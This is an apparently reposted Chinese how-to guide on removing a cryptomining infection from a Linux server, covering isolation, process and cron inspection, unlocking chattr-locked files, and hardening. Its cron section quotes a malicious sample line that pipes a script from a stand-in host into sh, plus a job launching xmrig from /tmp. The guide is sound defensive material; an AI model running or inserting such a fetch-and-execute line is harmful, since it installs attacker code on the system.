发现服务器感染挖矿病毒后,最稳妥的做法是先切断网络对外连接,再查找并清除异常进程与定时任务,最后修复入侵漏洞。
先说结论:单纯杀死进程无法根治,病毒通常会通过定时任务或系统服务自动重启,必须同时清理持久化配置并修补入口。
- 先判断:确认 CPU 占用异常及可疑网络连接,隔离服务器防止扩散。
- 优先做:清除恶意进程、定时任务、启动项及隐藏文件,恢复系统锁定属性。
- 再验证:监控 CPU 负载与外连请求,确认无复发迹象后加固安全策略。
一、紧急隔离与进程定位
1. 网络隔离
在清理前,先在云控制台安全组中禁用所有出站流量,或使用 iptables 阻断对外连接,防止病毒下载新组件或连接矿池。
2. 查找异常进程
使用 top 或 htop 找到 CPU 占用极高的进程,记录 PID。注意进程名可能伪装成系统服务(如 kworker、systemd)。
关键步骤:确认进程真实路径,避免误杀系统进程。
# 查看进程对应的真实可执行文件路径
ls -l /proc/<PID>/exe# 查看进程启动命令详情
cat /proc/<PID>/cmdline如果路径指向 /tmp、/var/tmp 或隐藏目录,基本可确认为恶意进程。使用 kill -9 PID 终止,如果无法杀死,检查是否被锁定。
3. 排查异常网络连接
新系统默认可能未安装 netstat,建议使用 ss 命令。重点关注连接矿池常见端口(如 3333、4444、8333、14444 等)的 ESTABLISHED 连接。
# 查看异常网络连接(推荐)
ss -antp | grep ESTABLISHED# 若无 ss 命令,可安装 net-tools 后使用
# netstat -antp | grep ESTABLISHED二、清理持久化配置与隐藏文件
1. 清理定时任务(Cron)
挖矿病毒常写入定时任务确保存活。检查以下位置并删除恶意条目。
# 查看当前用户定时任务
crontab -l# 查看系统级定时任务目录
ls -la /etc/cron.*
cat /etc/crontab典型恶意样本特征:
若发现类似以下内容,通常为挖矿脚本调度:
* * * * * curl http://evil-domain.com/sh.sh | sh
*/10 * * * * /tmp/.X11-unix/xmrig清理范围包括:
/var/spool/cron/*
/etc/cron.d/*
/etc/cron.hourly/* 等目录
2. 高危目录专项排查
病毒常将自身藏在临时目录或内存盘中。重点检查并清理以下目录中的可疑可执行文件:
# 查找最近 2 天内被修改的可执行文件
find /tmp /var/tmp /dev/shm -type f -mtime -2 -perm /111 -ls3. 解锁并删除隐藏文件
病毒常使用 chattr +i 锁定文件。使用 lsattr 查看属性,若有 i 属性,先用 chattr -i 解锁,再删除文件。
# 查看文件属性
lsattr /path/to/suspicious/file# 解锁并删除
chattr -i /path/to/suspicious/file
rm -rf /path/to/suspicious/file4. 检查系统服务与启动项
查看 systemd 服务及 rc.local,防止病毒注册为系统服务。
systemctl list-units `--type`=service `--state`=running
cat /etc/rc.local三、验证清理效果
清理完成后,需持续监控确保无复发:
- CPU 负载:观察 top 命令,CPU 使用率应回落到正常水平。
- 网络连接:使用 ss 命令检查是否有异常外连,特别是矿池常见端口。
- 日志审计:查看 /var/log/cron 或 /var/log/syslog,确认没有新的定时任务被创建。
- 持续监控:建议持续监控 24 小时,确保病毒没有残留的守护进程。
四、常见陷阱与注意事项
1. 进程名伪装:病毒进程名可能与系统进程极相似,需结合命令行路径(cmdline)判断。
2. 文件锁定:直接 rm 删除失败时,别忘了检查 lsattr 属性。
3. 多处持久化:清理了一个定时任务,但病毒在 systemd 或 rc.local 里还有备份,导致反复重生。
4. 命令被篡改:如果 ps 或 top 命令本身被替换,可能看不到真实进程,建议使用静态编译的工具包或从正常服务器复制命令。
5. 入口修复:常见入口包括弱密码、未授权访问的 Redis/Docker 端口、漏洞未修复的 Web 服务。清理病毒后务必修改密码,绑定监听地址,更新软件版本。
原文链接:https://www.zjcp.cc/ask/11367.html